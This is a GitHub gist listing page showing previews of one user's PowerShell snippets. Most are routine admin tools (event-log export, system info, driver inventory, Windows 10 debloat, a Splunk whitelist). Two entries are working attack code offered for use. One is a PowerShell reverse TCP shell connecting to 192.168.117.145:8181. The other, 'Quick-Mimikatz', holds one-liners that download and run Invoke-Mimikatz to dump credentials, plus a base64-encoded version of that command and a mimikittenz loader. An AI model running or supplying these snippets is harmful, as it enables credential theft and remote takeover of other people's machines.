Skip to content

Instantly share code, notes, and snippets.

View PolarBearGod's full-sized avatar

PolarBearGod

15 followers · 21 following
  • Florida
View GitHub Profile
@PolarBearGod
PolarBearGod / EventLogs2CSV.ps1
Last active October 5, 2018 16:48
# Full Kernal level deep event log
# Length of time takes to scan 2-10 minutes depending on endpoint
Get-WinEvent -ListLog * -ErrorAction 'silentlycontinue' | Foreach-Object { get-winevent -LogName $_.logname} | Export-Csv -NoTypeInformation C:\Windows\Temp\$env:COMPUTERNAME-fullsystem-eventlogs.csv
# Event Log Collection - Application to CSV
Get-WinEvent -Logname 'application' | Select * | Export-Csv -NoTypeInformation "$env:systemroot\Temp\$env:COMPUTERNAME-application-eventlogs.csv"
# Event Log Collection - Security to CSV
Get-WinEvent -Logname 'security' | Select * | Export-Csv -NoTypeInformation "$env:systemroot\Temp\$env:COMPUTERNAME-security-eventlogs.csv"
@PolarBearGod
PolarBearGod / Get-SystemInfo.ps1
Last active September 4, 2020 16:00
Function Get-SystemInfo {
param([Parameter(Mandatory = $true)] $ComputerName, [switch] $IgnorePing)
$computer = $ComputerName
$data = @{}
$data.' ComputerName' = $computer
$ping = Test-Connection -quiet -count 1 $computer
$Ping = $(if ($ping) { 'Yes' }else { 'No' })
$ErrorActionPreference = 'SilentlyContinue'
if ($ips = [System.Net.Dns]::GetHostAddresses($computer) | ForEach-Object { $_.IPAddressToString }) { $data.'IP Address(es) from DNS' = ($ips -join ', ') }else { $data.'IP Address from DNS' = 'Could not resolve' }
$ErrorActionPreference = 'Continue'
@PolarBearGod
PolarBearGod / Get-ChromeExtensions.ps1
Last active July 26, 2018 18:09
Found Script https://community.spiceworks.com/scripts/show/3911-get-chromeextensions-ps1
param(
[String]$OutputFolder = $null,
[String]$ExtensionId = $null,
[Switch]$Remove,
[Switch]$WhatIf
)
##: Globals
$retval = $false
@PolarBearGod
PolarBearGod / reclaimWindows10.ps1
Created July 3, 2018 19:04 — forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <[email protected]>
# Modified by: alirobe <[email protected]> based on my personal preferences.
# Version: 2.12.1, 2018-03-15
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
@PolarBearGod
PolarBearGod / ZipFiles.ps1
Created June 29, 2018 18:07
Function ZipFiles {
<#
.SYNOPSIS
A function to zip or unzip files.
.DESCRIPTION
This function has 3 possible uses.
1) Zip a folder or files and save the zip to specified location.
2) Unzip a zip file to a specified folder.
3) Unzip a zip file and delete the original zip when complete.
@PolarBearGod
PolarBearGod / Script_Template.ps1
Created June 28, 2018 16:24 — forked from 9to5IT/Script_Template.ps1
PowerShell: Script Template
#requires -version 2
<#
.SYNOPSIS
<Overview of script>
.DESCRIPTION
<Brief description of script>
.PARAMETER <Parameter_Name>
<Brief description of parameter input required. Repeat this attribute if required>
@PolarBearGod
PolarBearGod / Splunk__Whitelist.txt
Created March 23, 2018 17:27
NOT IP_Address=10.0.0.0/8
NOT IP_Address=172.16.0.0/12
NOT IP_Address=192.168.0.0/16
NOT DNS_Hostname="*.google.com"
NOT DNS_Hostname="*.google.ac"
NOT DNS_Hostname="*.google.ad"
NOT DNS_Hostname="*.google.ae"
NOT DNS_Hostname="*.google.com.af"
NOT DNS_Hostname="*.google.com.ag"
NOT DNS_Hostname="*.google.com.ai"
@PolarBearGod
PolarBearGod / Quick-ReverseTCP_Powershell.ps1
Last active March 7, 2018 02:49
$socket = new-object System.Net.Sockets.TcpClient('192.168.117.145', 8181);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("> ");
$writer.Flush();
$read = $null;
@PolarBearGod
PolarBearGod / Quick-Mimikatz
Last active August 9, 2024 11:04 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQA=
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Inv
@PolarBearGod
PolarBearGod / Get-DriverInformation.ps1
Created March 2, 2018 14:11
Get-WmiObject Win32_PnPSignedDriver | select DeviceName, Description, DeviceID, DriverDate, DriverProviderName, FriendlyName, DriverVersion, IsSigned, Signer | export-csv "c:\Windows\Temp\$env:COMPUTERNAME-DriverInformation.csv"